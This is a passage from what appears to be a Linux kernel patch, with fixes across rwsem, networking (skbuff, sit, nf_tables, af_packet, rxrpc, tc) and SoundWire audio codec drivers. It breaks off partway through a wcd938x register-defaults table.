++					   unsigned int debug_id);
+ int rxrpc_kernel_send_data(struct socket *, struct rxrpc_call *,
+ 			   struct msghdr *, size_t,
+ 			   rxrpc_notify_end_tx_t);
+diff --git a/kernel/locking/rwsem.c b/kernel/locking/rwsem.c
+index 84d5b649b95fe..92d8e2c4edda0 100644
+--- a/kernel/locking/rwsem.c
++++ b/kernel/locking/rwsem.c
+@@ -1251,7 +1251,7 @@ static struct rw_semaphore *rwsem_downgrade_wake(struct rw_semaphore *sem)
+ /*
+  * lock for reading
+  */
+-static inline int __down_read_common(struct rw_semaphore *sem, int state)
++static __always_inline int __down_read_common(struct rw_semaphore *sem, int state)
+ {
+ 	int ret = 0;
+ 	long count;
+@@ -1269,17 +1269,17 @@ out:
+ 	return ret;
+ }
+ 
+-static inline void __down_read(struct rw_semaphore *sem)
++static __always_inline void __down_read(struct rw_semaphore *sem)
+ {
+ 	__down_read_common(sem, TASK_UNINTERRUPTIBLE);
+ }
+ 
+-static inline int __down_read_interruptible(struct rw_semaphore *sem)
++static __always_inline int __down_read_interruptible(struct rw_semaphore *sem)
+ {
+ 	return __down_read_common(sem, TASK_INTERRUPTIBLE);
+ }
+ 
+-static inline int __down_read_killable(struct rw_semaphore *sem)
++static __always_inline int __down_read_killable(struct rw_semaphore *sem)
+ {
+ 	return __down_read_common(sem, TASK_KILLABLE);
+ }
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 6f5ef18a8b772..ef3dd8f120e02 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -1608,7 +1608,7 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ {
+ 	int num_frags = skb_shinfo(skb)->nr_frags;
+ 	struct page *page, *head = NULL;
+-	int i, new_frags;
++	int i, order, psize, new_frags;
+ 	u32 d_off;
+ 
+ 	if (skb_shared(skb) || skb_unclone(skb, gfp_mask))
+@@ -1617,9 +1617,17 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 	if (!num_frags)
+ 		goto release;
+ 
+-	new_frags = (__skb_pagelen(skb) + PAGE_SIZE - 1) >> PAGE_SHIFT;
++	/* We might have to allocate high order pages, so compute what minimum
++	 * page order is needed.
++	 */
++	order = 0;
++	while ((PAGE_SIZE << order) * MAX_SKB_FRAGS < __skb_pagelen(skb))
++		order++;
++	psize = (PAGE_SIZE << order);
++
++	new_frags = (__skb_pagelen(skb) + psize - 1) >> (PAGE_SHIFT + order);
+ 	for (i = 0; i < new_frags; i++) {
+-		page = alloc_page(gfp_mask);
++		page = alloc_pages(gfp_mask | __GFP_COMP, order);
+ 		if (!page) {
+ 			while (head) {
+ 				struct page *next = (struct page *)page_private(head);
+@@ -1646,11 +1654,11 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 			vaddr = kmap_atomic(p);
+ 
+ 			while (done < p_len) {
+-				if (d_off == PAGE_SIZE) {
++				if (d_off == psize) {
+ 					d_off = 0;
+ 					page = (struct page *)page_private(page);
+ 				}
+-				copy = min_t(u32, PAGE_SIZE - d_off, p_len - done);
++				copy = min_t(u32, psize - d_off, p_len - done);
+ 				memcpy(page_address(page) + d_off,
+ 				       vaddr + p_off + done, copy);
+ 				done += copy;
+@@ -1666,7 +1674,7 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 
+ 	/* skb frags point to kernel buffers */
+ 	for (i = 0; i < new_frags - 1; i++) {
+-		__skb_fill_page_desc(skb, i, head, 0, PAGE_SIZE);
++		__skb_fill_page_desc(skb, i, head, 0, psize);
+ 		head = (struct page *)page_private(head);
+ 	}
+ 	__skb_fill_page_desc(skb, new_frags - 1, head, 0, d_off);
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index 646b3e490c71a..f0c646a17700f 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -573,8 +573,8 @@ static int ethtool_get_link_ksettings(struct net_device *dev,
+ static int ethtool_set_link_ksettings(struct net_device *dev,
+ 				      void __user *useraddr)
+ {
++	struct ethtool_link_ksettings link_ksettings = {};
+ 	int err;
+-	struct ethtool_link_ksettings link_ksettings;
+ 
+ 	ASSERT_RTNL();
+ 
+diff --git a/net/ipv6/sit.c b/net/ipv6/sit.c
+index 70d81bba50939..3ffb6a5b1f82a 100644
+--- a/net/ipv6/sit.c
++++ b/net/ipv6/sit.c
+@@ -1095,12 +1095,13 @@ tx_err:
+ 
+ static void ipip6_tunnel_bind_dev(struct net_device *dev)
+ {
++	struct ip_tunnel *tunnel = netdev_priv(dev);
++	int t_hlen = tunnel->hlen + sizeof(struct iphdr);
+ 	struct net_device *tdev = NULL;
+-	struct ip_tunnel *tunnel;
++	int hlen = LL_MAX_HEADER;
+ 	const struct iphdr *iph;
+ 	struct flowi4 fl4;
+ 
+-	tunnel = netdev_priv(dev);
+ 	iph = &tunnel->parms.iph;
+ 
+ 	if (iph->daddr) {
+@@ -1123,14 +1124,15 @@ static void ipip6_tunnel_bind_dev(struct net_device *dev)
+ 		tdev = __dev_get_by_index(tunnel->net, tunnel->parms.link);
+ 
+ 	if (tdev && !netif_is_l3_master(tdev)) {
+-		int t_hlen = tunnel->hlen + sizeof(struct iphdr);
+ 		int mtu;
+ 
+ 		mtu = tdev->mtu - t_hlen;
+ 		if (mtu < IPV6_MIN_MTU)
+ 			mtu = IPV6_MIN_MTU;
+ 		WRITE_ONCE(dev->mtu, mtu);
++		hlen = tdev->hard_header_len + tdev->needed_headroom;
+ 	}
++	dev->needed_headroom = t_hlen + hlen;
+ }
+ 
+ static void ipip6_tunnel_update(struct ip_tunnel *t, struct ip_tunnel_parm *p,
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index e4da7267ed4bd..e0706c33e5472 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1064,7 +1064,7 @@ static void tcp_v6_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 			if (np->repflow)
+ 				label = ip6_flowlabel(ipv6h);
+ 			priority = sk->sk_priority;
+-			txhash = sk->sk_hash;
++			txhash = sk->sk_txhash;
+ 		}
+ 		if (sk->sk_state == TCP_TIME_WAIT) {
+ 			label = cpu_to_be32(inet_twsk(sk)->tw_flowlabel);
+diff --git a/net/ncsi/ncsi-aen.c b/net/ncsi/ncsi-aen.c
+index b635c194f0a85..62fb1031763d1 100644
+--- a/net/ncsi/ncsi-aen.c
++++ b/net/ncsi/ncsi-aen.c
+@@ -165,6 +165,7 @@ static int ncsi_aen_handler_cr(struct ncsi_dev_priv *ndp,
+ 	nc->state = NCSI_CHANNEL_INACTIVE;
+ 	list_add_tail_rcu(&nc->link, &ndp->channel_queue);
+ 	spin_unlock_irqrestore(&ndp->lock, flags);
++	nc->modes[NCSI_MODE_TX_ENABLE].enable = 0;
+ 
+ 	return ncsi_process_next_channel(ndp);
+ }
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 96bc4b8ded423..d64478af0129f 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -1951,7 +1951,8 @@ static struct nft_hook *nft_hook_list_find(struct list_head *hook_list,
+ 
+ static int nf_tables_parse_netdev_hooks(struct net *net,
+ 					const struct nlattr *attr,
+-					struct list_head *hook_list)
++					struct list_head *hook_list,
++					struct netlink_ext_ack *extack)
+ {
+ 	struct nft_hook *hook, *next;
+ 	const struct nlattr *tmp;
+@@ -1965,10 +1966,12 @@ static int nf_tables_parse_netdev_hooks(struct net *net,
+ 
+ 		hook = nft_netdev_hook_alloc(net, tmp);
+ 		if (IS_ERR(hook)) {
++			NL_SET_BAD_ATTR(extack, tmp);
+ 			err = PTR_ERR(hook);
+ 			goto err_hook;
+ 		}
+ 		if (nft_hook_list_find(hook_list, hook)) {
++			NL_SET_BAD_ATTR(extack, tmp);
+ 			kfree(hook);
+ 			err = -EEXIST;
+ 			goto err_hook;
+@@ -2001,20 +2004,23 @@ struct nft_chain_hook {
+ 
+ static int nft_chain_parse_netdev(struct net *net,
+ 				  struct nlattr *tb[],
+-				  struct list_head *hook_list)
++				  struct list_head *hook_list,
++				  struct netlink_ext_ack *extack)
+ {
+ 	struct nft_hook *hook;
+ 	int err;
+ 
+ 	if (tb[NFTA_HOOK_DEV]) {
+ 		hook = nft_netdev_hook_alloc(net, tb[NFTA_HOOK_DEV]);
+-		if (IS_ERR(hook))
++		if (IS_ERR(hook)) {
++			NL_SET_BAD_ATTR(extack, tb[NFTA_HOOK_DEV]);
+ 			return PTR_ERR(hook);
++		}
+ 
+ 		list_add_tail(&hook->list, hook_list);
+ 	} else if (tb[NFTA_HOOK_DEVS]) {
+ 		err = nf_tables_parse_netdev_hooks(net, tb[NFTA_HOOK_DEVS],
+-						   hook_list);
++						   hook_list, extack);
+ 		if (err < 0)
+ 			return err;
+ 
+@@ -2047,8 +2053,10 @@ static int nft_chain_parse_hook(struct net *net,
+ 		return err;
+ 
+ 	if (ha[NFTA_HOOK_HOOKNUM] == NULL ||
+-	    ha[NFTA_HOOK_PRIORITY] == NULL)
+-		return -EINVAL;
++	    ha[NFTA_HOOK_PRIORITY] == NULL) {
++		NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_NAME]);
++		return -ENOENT;
++	}
+ 
+ 	hook->num = ntohl(nla_get_be32(ha[NFTA_HOOK_HOOKNUM]));
+ 	hook->priority = ntohl(nla_get_be32(ha[NFTA_HOOK_PRIORITY]));
+@@ -2082,7 +2090,7 @@ static int nft_chain_parse_hook(struct net *net,
+ 
+ 	INIT_LIST_HEAD(&hook->list);
+ 	if (nft_base_chain_netdev(family, hook->num)) {
+-		err = nft_chain_parse_netdev(net, ha, &hook->list);
++		err = nft_chain_parse_netdev(net, ha, &hook->list, extack);
+ 		if (err < 0) {
+ 			module_put(type->owner);
+ 			return err;
+@@ -7550,9 +7558,10 @@ static const struct nla_policy nft_flowtable_hook_policy[NFTA_FLOWTABLE_HOOK_MAX
+ };
+ 
+ static int nft_flowtable_parse_hook(const struct nft_ctx *ctx,
+-				    const struct nlattr *attr,
++				    const struct nlattr * const nla[],
+ 				    struct nft_flowtable_hook *flowtable_hook,
+-				    struct nft_flowtable *flowtable, bool add)
++				    struct nft_flowtable *flowtable,
++				    struct netlink_ext_ack *extack, bool add)
+ {
+ 	struct nlattr *tb[NFTA_FLOWTABLE_HOOK_MAX + 1];
+ 	struct nft_hook *hook;
+@@ -7561,15 +7570,18 @@ static int nft_flowtable_parse_hook(const struct nft_ctx *ctx,
+ 
+ 	INIT_LIST_HEAD(&flowtable_hook->list);
+ 
+-	err = nla_parse_nested_deprecated(tb, NFTA_FLOWTABLE_HOOK_MAX, attr,
++	err = nla_parse_nested_deprecated(tb, NFTA_FLOWTABLE_HOOK_MAX,
++					  nla[NFTA_FLOWTABLE_HOOK],
+ 					  nft_flowtable_hook_policy, NULL);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	if (add) {
+ 		if (!tb[NFTA_FLOWTABLE_HOOK_NUM] ||
+-		    !tb[NFTA_FLOWTABLE_HOOK_PRIORITY])
+-			return -EINVAL;
++		    !tb[NFTA_FLOWTABLE_HOOK_PRIORITY]) {
++			NL_SET_BAD_ATTR(extack, nla[NFTA_FLOWTABLE_NAME]);
++			return -ENOENT;
++		}
+ 
+ 		hooknum = ntohl(nla_get_be32(tb[NFTA_FLOWTABLE_HOOK_NUM]));
+ 		if (hooknum != NF_NETDEV_INGRESS)
+@@ -7599,7 +7611,8 @@ static int nft_flowtable_parse_hook(const struct nft_ctx *ctx,
+ 	if (tb[NFTA_FLOWTABLE_HOOK_DEVS]) {
+ 		err = nf_tables_parse_netdev_hooks(ctx->net,
+ 						   tb[NFTA_FLOWTABLE_HOOK_DEVS],
+-						   &flowtable_hook->list);
++						   &flowtable_hook->list,
++						   extack);
+ 		if (err < 0)
+ 			return err;
+ 	}
+@@ -7731,7 +7744,7 @@ err_unregister_net_hooks:
+ 	return err;
+ }
+ 
+-static void nft_flowtable_hooks_destroy(struct list_head *hook_list)
++static void nft_hooks_destroy(struct list_head *hook_list)
+ {
+ 	struct nft_hook *hook, *next;
+ 
+@@ -7742,7 +7755,8 @@ static void nft_flowtable_hooks_destroy(struct list_head *hook_list)
+ }
+ 
+ static int nft_flowtable_update(struct nft_ctx *ctx, const struct nlmsghdr *nlh,
+-				struct nft_flowtable *flowtable)
++				struct nft_flowtable *flowtable,
++				struct netlink_ext_ack *extack)
+ {
+ 	const struct nlattr * const *nla = ctx->nla;
+ 	struct nft_flowtable_hook flowtable_hook;
+@@ -7752,8 +7766,8 @@ static int nft_flowtable_update(struct nft_ctx *ctx, const struct nlmsghdr *nlh,
+ 	u32 flags;
+ 	int err;
+ 
+-	err = nft_flowtable_parse_hook(ctx, nla[NFTA_FLOWTABLE_HOOK],
+-				       &flowtable_hook, flowtable, false);
++	err = nft_flowtable_parse_hook(ctx, nla, &flowtable_hook, flowtable,
++				       extack, false);
+ 	if (err < 0)
+ 		return err;
+ 
+@@ -7858,7 +7872,7 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 
+ 		nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
+-		return nft_flowtable_update(&ctx, info->nlh, flowtable);
++		return nft_flowtable_update(&ctx, info->nlh, flowtable, extack);
+ 	}
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+@@ -7898,8 +7912,8 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 	if (err < 0)
+ 		goto err3;
+ 
+-	err = nft_flowtable_parse_hook(&ctx, nla[NFTA_FLOWTABLE_HOOK],
+-				       &flowtable_hook, flowtable, true);
++	err = nft_flowtable_parse_hook(&ctx, nla, &flowtable_hook, flowtable,
++				       extack, true);
+ 	if (err < 0)
+ 		goto err4;
+ 
+@@ -7911,7 +7925,7 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 					       &flowtable->hook_list,
+ 					       flowtable);
+ 	if (err < 0) {
+-		nft_flowtable_hooks_destroy(&flowtable->hook_list);
++		nft_hooks_destroy(&flowtable->hook_list);
+ 		goto err4;
+ 	}
+ 
+@@ -7951,7 +7965,8 @@ static void nft_flowtable_hook_release(struct nft_flowtable_hook *flowtable_hook
+ }
+ 
+ static int nft_delflowtable_hook(struct nft_ctx *ctx,
+-				 struct nft_flowtable *flowtable)
++				 struct nft_flowtable *flowtable,
++				 struct netlink_ext_ack *extack)
+ {
+ 	const struct nlattr * const *nla = ctx->nla;
+ 	struct nft_flowtable_hook flowtable_hook;
+@@ -7960,8 +7975,8 @@ static int nft_delflowtable_hook(struct nft_ctx *ctx,
+ 	struct nft_trans *trans;
+ 	int err;
+ 
+-	err = nft_flowtable_parse_hook(ctx, nla[NFTA_FLOWTABLE_HOOK],
+-				       &flowtable_hook, flowtable, false);
++	err = nft_flowtable_parse_hook(ctx, nla, &flowtable_hook, flowtable,
++				       extack, false);
+ 	if (err < 0)
+ 		return err;
+ 
+@@ -8039,7 +8054,7 @@ static int nf_tables_delflowtable(struct sk_buff *skb,
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
+ 	if (nla[NFTA_FLOWTABLE_HOOK])
+-		return nft_delflowtable_hook(&ctx, flowtable);
++		return nft_delflowtable_hook(&ctx, flowtable, extack);
+ 
+ 	if (flowtable->use > 0) {
+ 		NL_SET_BAD_ATTR(extack, attr);
+@@ -8685,7 +8700,7 @@ static void nft_commit_release(struct nft_trans *trans)
+ 		break;
+ 	case NFT_MSG_DELFLOWTABLE:
+ 		if (nft_trans_flowtable_update(trans))
+-			nft_flowtable_hooks_destroy(&nft_trans_flowtable_hooks(trans));
++			nft_hooks_destroy(&nft_trans_flowtable_hooks(trans));
+ 		else
+ 			nf_tables_flowtable_destroy(nft_trans_flowtable(trans));
+ 		break;
+@@ -9331,7 +9346,7 @@ static void nf_tables_abort_release(struct nft_trans *trans)
+ 		break;
+ 	case NFT_MSG_NEWFLOWTABLE:
+ 		if (nft_trans_flowtable_update(trans))
+-			nft_flowtable_hooks_destroy(&nft_trans_flowtable_hooks(trans));
++			nft_hooks_destroy(&nft_trans_flowtable_hooks(trans));
+ 		else
+ 			nf_tables_flowtable_destroy(nft_trans_flowtable(trans));
+ 		break;
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 1259b34a28ebe..cc7a42ba94f93 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -2036,7 +2036,7 @@ retry:
+ 		goto retry;
+ 	}
+ 
+-	if (!dev_validate_header(dev, skb->data, len)) {
++	if (!dev_validate_header(dev, skb->data, len) || !skb->len) {
+ 		err = -EINVAL;
+ 		goto out_unlock;
+ 	}
+diff --git a/net/rxrpc/af_rxrpc.c b/net/rxrpc/af_rxrpc.c
+index ebbd4a1c3f86e..de5bebc99a4b5 100644
+--- a/net/rxrpc/af_rxrpc.c
++++ b/net/rxrpc/af_rxrpc.c
+@@ -265,6 +265,7 @@ static int rxrpc_listen(struct socket *sock, int backlog)
+  * @key: The security context to use (defaults to socket setting)
+  * @user_call_ID: The ID to use
+  * @tx_total_len: Total length of data to transmit during the call (or -1)
++ * @hard_timeout: The maximum lifespan of the call in sec
+  * @gfp: The allocation constraints
+  * @notify_rx: Where to send notifications instead of socket queue
+  * @upgrade: Request service upgrade for call
+@@ -283,6 +284,7 @@ struct rxrpc_call *rxrpc_kernel_begin_call(struct socket *sock,
+ 					   struct key *key,
+ 					   unsigned long user_call_ID,
+ 					   s64 tx_total_len,
++					   u32 hard_timeout,
+ 					   gfp_t gfp,
+ 					   rxrpc_notify_rx_t notify_rx,
+ 					   bool upgrade,
+@@ -313,6 +315,7 @@ struct rxrpc_call *rxrpc_kernel_begin_call(struct socket *sock,
+ 	p.tx_total_len		= tx_total_len;
+ 	p.interruptibility	= interruptibility;
+ 	p.kernel		= true;
++	p.timeouts.hard		= hard_timeout;
+ 
+ 	memset(&cp, 0, sizeof(cp));
+ 	cp.local		= rx->local;
+diff --git a/net/rxrpc/ar-internal.h b/net/rxrpc/ar-internal.h
+index 433060cade038..ed0ef2dbd592b 100644
+--- a/net/rxrpc/ar-internal.h
++++ b/net/rxrpc/ar-internal.h
+@@ -614,6 +614,7 @@ struct rxrpc_call {
+ 	unsigned long		expect_term_by;	/* When we expect call termination by */
+ 	u32			next_rx_timo;	/* Timeout for next Rx packet (jif) */
+ 	u32			next_req_timo;	/* Timeout for next Rx request packet (jif) */
++	u32			hard_timo;	/* Maximum lifetime or 0 (jif) */
+ 	struct timer_list	timer;		/* Combined event timer */
+ 	struct work_struct	destroyer;	/* In-process-context destroyer */
+ 	rxrpc_notify_rx_t	notify_rx;	/* kernel service Rx notification function */
+diff --git a/net/rxrpc/call_object.c b/net/rxrpc/call_object.c
+index 7ce562f6dc8d5..80ed67f4f3a7d 100644
+--- a/net/rxrpc/call_object.c
++++ b/net/rxrpc/call_object.c
+@@ -225,6 +225,13 @@ static struct rxrpc_call *rxrpc_alloc_client_call(struct rxrpc_sock *rx,
+ 	if (cp->exclusive)
+ 		__set_bit(RXRPC_CALL_EXCLUSIVE, &call->flags);
+ 
++	if (p->timeouts.normal)
++		call->next_rx_timo = min(msecs_to_jiffies(p->timeouts.normal), 1UL);
++	if (p->timeouts.idle)
++		call->next_req_timo = min(msecs_to_jiffies(p->timeouts.idle), 1UL);
++	if (p->timeouts.hard)
++		call->hard_timo = p->timeouts.hard * HZ;
++
+ 	ret = rxrpc_init_client_call_security(call);
+ 	if (ret < 0) {
+ 		rxrpc_prefail_call(call, RXRPC_CALL_LOCAL_ERROR, ret);
+@@ -256,7 +263,7 @@ void rxrpc_start_call_timer(struct rxrpc_call *call)
+ 	call->keepalive_at = j;
+ 	call->expect_rx_by = j;
+ 	call->expect_req_by = j;
+-	call->expect_term_by = j;
++	call->expect_term_by = j + call->hard_timo;
+ 	call->timer.expires = now;
+ }
+ 
+diff --git a/net/rxrpc/sendmsg.c b/net/rxrpc/sendmsg.c
+index da49fcf1c4567..8e0b94714e849 100644
+--- a/net/rxrpc/sendmsg.c
++++ b/net/rxrpc/sendmsg.c
+@@ -50,15 +50,11 @@ static int rxrpc_wait_to_be_connected(struct rxrpc_call *call, long *timeo)
+ 	_enter("%d", call->debug_id);
+ 
+ 	if (rxrpc_call_state(call) != RXRPC_CALL_CLIENT_AWAIT_CONN)
+-		return call->error;
++		goto no_wait;
+ 
+ 	add_wait_queue_exclusive(&call->waitq, &myself);
+ 
+ 	for (;;) {
+-		ret = call->error;
+-		if (ret < 0)
+-			break;
+-
+ 		switch (call->interruptibility) {
+ 		case RXRPC_INTERRUPTIBLE:
+ 		case RXRPC_PREINTERRUPTIBLE:
+@@ -69,10 +65,9 @@ static int rxrpc_wait_to_be_connected(struct rxrpc_call *call, long *timeo)
+ 			set_current_state(TASK_UNINTERRUPTIBLE);
+ 			break;
+ 		}
+-		if (rxrpc_call_state(call) != RXRPC_CALL_CLIENT_AWAIT_CONN) {
+-			ret = call->error;
++
++		if (rxrpc_call_state(call) != RXRPC_CALL_CLIENT_AWAIT_CONN)
+ 			break;
+-		}
+ 		if ((call->interruptibility == RXRPC_INTERRUPTIBLE ||
+ 		     call->interruptibility == RXRPC_PREINTERRUPTIBLE) &&
+ 		    signal_pending(current)) {
+@@ -85,6 +80,7 @@ static int rxrpc_wait_to_be_connected(struct rxrpc_call *call, long *timeo)
+ 	remove_wait_queue(&call->waitq, &myself);
+ 	__set_current_state(TASK_RUNNING);
+ 
++no_wait:
+ 	if (ret == 0 && rxrpc_call_is_complete(call))
+ 		ret = call->error;
+ 
+@@ -655,15 +651,19 @@ int rxrpc_do_sendmsg(struct rxrpc_sock *rx, struct msghdr *msg, size_t len)
+ 		if (IS_ERR(call))
+ 			return PTR_ERR(call);
+ 		/* ... and we have the call lock. */
++		p.call.nr_timeouts = 0;
+ 		ret = 0;
+ 		if (rxrpc_call_is_complete(call))
+ 			goto out_put_unlock;
+ 	} else {
+ 		switch (rxrpc_call_state(call)) {
+-		case RXRPC_CALL_UNINITIALISED:
+ 		case RXRPC_CALL_CLIENT_AWAIT_CONN:
+-		case RXRPC_CALL_SERVER_PREALLOC:
+ 		case RXRPC_CALL_SERVER_SECURING:
++			if (p.command == RXRPC_CMD_SEND_ABORT)
++				break;
++			fallthrough;
++		case RXRPC_CALL_UNINITIALISED:
++		case RXRPC_CALL_SERVER_PREALLOC:
+ 			rxrpc_put_call(call, rxrpc_call_put_sendmsg);
+ 			ret = -EBUSY;
+ 			goto error_release_sock;
+@@ -703,7 +703,7 @@ int rxrpc_do_sendmsg(struct rxrpc_sock *rx, struct msghdr *msg, size_t len)
+ 		fallthrough;
+ 	case 1:
+ 		if (p.call.timeouts.hard > 0) {
+-			j = msecs_to_jiffies(p.call.timeouts.hard);
++			j = p.call.timeouts.hard * HZ;
+ 			now = jiffies;
+ 			j += now;
+ 			WRITE_ONCE(call->expect_term_by, j);
+diff --git a/net/sched/act_mirred.c b/net/sched/act_mirred.c
+index 8037ec9b1d311..a61482c5edbe7 100644
+--- a/net/sched/act_mirred.c
++++ b/net/sched/act_mirred.c
+@@ -264,7 +264,7 @@ TC_INDIRECT_SCOPE int tcf_mirred_act(struct sk_buff *skb,
+ 		goto out;
+ 	}
+ 
+-	if (unlikely(!(dev->flags & IFF_UP))) {
++	if (unlikely(!(dev->flags & IFF_UP)) || !netif_carrier_ok(dev)) {
+ 		net_notice_ratelimited("tc mirred to Houston: device %s is down\n",
+ 				       dev->name);
+ 		goto out;
+diff --git a/net/sched/cls_api.c b/net/sched/cls_api.c
+index 668130f089034..3f37e9c10af4d 100644
+--- a/net/sched/cls_api.c
++++ b/net/sched/cls_api.c
+@@ -1484,6 +1484,7 @@ static int tcf_block_bind(struct tcf_block *block,
+ 
+ err_unroll:
+ 	list_for_each_entry_safe(block_cb, next, &bo->cb_list, list) {
++		list_del(&block_cb->driver_list);
+ 		if (i-- > 0) {
+ 			list_del(&block_cb->list);
+ 			tcf_block_playback_offloads(block, block_cb->cb,
+diff --git a/sound/soc/codecs/rt1316-sdw.c b/sound/soc/codecs/rt1316-sdw.c
+index e6294cc7a9954..45a3eff31915b 100644
+--- a/sound/soc/codecs/rt1316-sdw.c
++++ b/sound/soc/codecs/rt1316-sdw.c
+@@ -584,7 +584,7 @@ static int rt1316_sdw_pcm_hw_free(struct snd_pcm_substream *substream,
+  * slave_ops: callbacks for get_clock_stop_mode, clock_stop and
+  * port_prep are not defined for now
+  */
+-static struct sdw_slave_ops rt1316_slave_ops = {
++static const struct sdw_slave_ops rt1316_slave_ops = {
+ 	.read_prop = rt1316_read_prop,
+ 	.update_status = rt1316_update_status,
+ };
+diff --git a/sound/soc/codecs/rt1318-sdw.c b/sound/soc/codecs/rt1318-sdw.c
+index f85f5ab2c6d04..c6ec86e97a6e7 100644
+--- a/sound/soc/codecs/rt1318-sdw.c
++++ b/sound/soc/codecs/rt1318-sdw.c
+@@ -697,7 +697,7 @@ static int rt1318_sdw_pcm_hw_free(struct snd_pcm_substream *substream,
+  * slave_ops: callbacks for get_clock_stop_mode, clock_stop and
+  * port_prep are not defined for now
+  */
+-static struct sdw_slave_ops rt1318_slave_ops = {
++static const struct sdw_slave_ops rt1318_slave_ops = {
+ 	.read_prop = rt1318_read_prop,
+ 	.update_status = rt1318_update_status,
+ };
+diff --git a/sound/soc/codecs/rt711-sdca-sdw.c b/sound/soc/codecs/rt711-sdca-sdw.c
+index 88a8392a58edb..e23cec4c457de 100644
+--- a/sound/soc/codecs/rt711-sdca-sdw.c
++++ b/sound/soc/codecs/rt711-sdca-sdw.c
+@@ -338,7 +338,7 @@ io_error:
+ 	return ret;
+ }
+ 
+-static struct sdw_slave_ops rt711_sdca_slave_ops = {
++static const struct sdw_slave_ops rt711_sdca_slave_ops = {
+ 	.read_prop = rt711_sdca_read_prop,
+ 	.interrupt_callback = rt711_sdca_interrupt_callback,
+ 	.update_status = rt711_sdca_update_status,
+diff --git a/sound/soc/codecs/rt715-sdca-sdw.c b/sound/soc/codecs/rt715-sdca-sdw.c
+index c54ecf3e69879..38a82e4e2f952 100644
+--- a/sound/soc/codecs/rt715-sdca-sdw.c
++++ b/sound/soc/codecs/rt715-sdca-sdw.c
+@@ -172,7 +172,7 @@ static int rt715_sdca_read_prop(struct sdw_slave *slave)
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops rt715_sdca_slave_ops = {
++static const struct sdw_slave_ops rt715_sdca_slave_ops = {
+ 	.read_prop = rt715_sdca_read_prop,
+ 	.update_status = rt715_sdca_update_status,
+ };
+diff --git a/sound/soc/codecs/wcd938x-sdw.c b/sound/soc/codecs/wcd938x-sdw.c
+index 1bf3c06a2b622..402286dfaea44 100644
+--- a/sound/soc/codecs/wcd938x-sdw.c
++++ b/sound/soc/codecs/wcd938x-sdw.c
+@@ -161,6 +161,14 @@ EXPORT_SYMBOL_GPL(wcd938x_sdw_set_sdw_stream);
+ static int wcd9380_update_status(struct sdw_slave *slave,
+ 				 enum sdw_slave_status status)
+ {
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(&slave->dev);
++
++	if (wcd->regmap && (status == SDW_SLAVE_ATTACHED)) {
++		/* Write out any cached changes that happened between probe and attach */
++		regcache_cache_only(wcd->regmap, false);
++		return regcache_sync(wcd->regmap);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -177,21 +185,1015 @@ static int wcd9380_interrupt_callback(struct sdw_slave *slave,
+ {
+ 	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(&slave->dev);
+ 	struct irq_domain *slave_irq = wcd->slave_irq;
+-	struct regmap *regmap = dev_get_regmap(&slave->dev, NULL);
+ 	u32 sts1, sts2, sts3;
+ 
+ 	do {
+ 		handle_nested_irq(irq_find_mapping(slave_irq, 0));
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_0, &sts1);
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_1, &sts2);
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_2, &sts3);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_0, &sts1);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_1, &sts2);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_2, &sts3);
+ 
+ 	} while (sts1 || sts2 || sts3);
+ 
+ 	return IRQ_HANDLED;
+ }
+ 
+-static struct sdw_slave_ops wcd9380_slave_ops = {
++static const struct reg_default wcd938x_defaults[] = {
++	{WCD938X_ANA_PAGE_REGISTER,                            0x00},
++	{WCD938X_ANA_BIAS,                                     0x00},
++	{WCD938X_ANA_RX_SUPPLIES,                              0x00},
++	{WCD938X_ANA_HPH,                                      0x0C},
++	{WCD938X_ANA_EAR,                                      0x00},
++	{WCD938X_ANA_EAR_COMPANDER_CTL,                        0x02},
++	{WCD938X_ANA_TX_CH1,                                   0x20},
++	{WCD938X_ANA_TX_CH2,                                   0x00},
++	{WCD938X_ANA_TX_CH3,                                   0x20},
++	{WCD938X_ANA_TX_CH4,                                   0x00},
++	{WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC,                 0x00},
++	{WCD938X_ANA_MICB3_DSP_EN_LOGIC,                       0x00},
++	{WCD938X_ANA_MBHC_MECH,                                0x39},
++	{WCD938X_ANA_MBHC_ELECT,                               0x08},
++	{WCD938X_ANA_MBHC_ZDET,                                0x00},
++	{WCD938X_ANA_MBHC_RESULT_1,                            0x00},
++	{WCD938X_ANA_MBHC_RESULT_2,                            0x00},
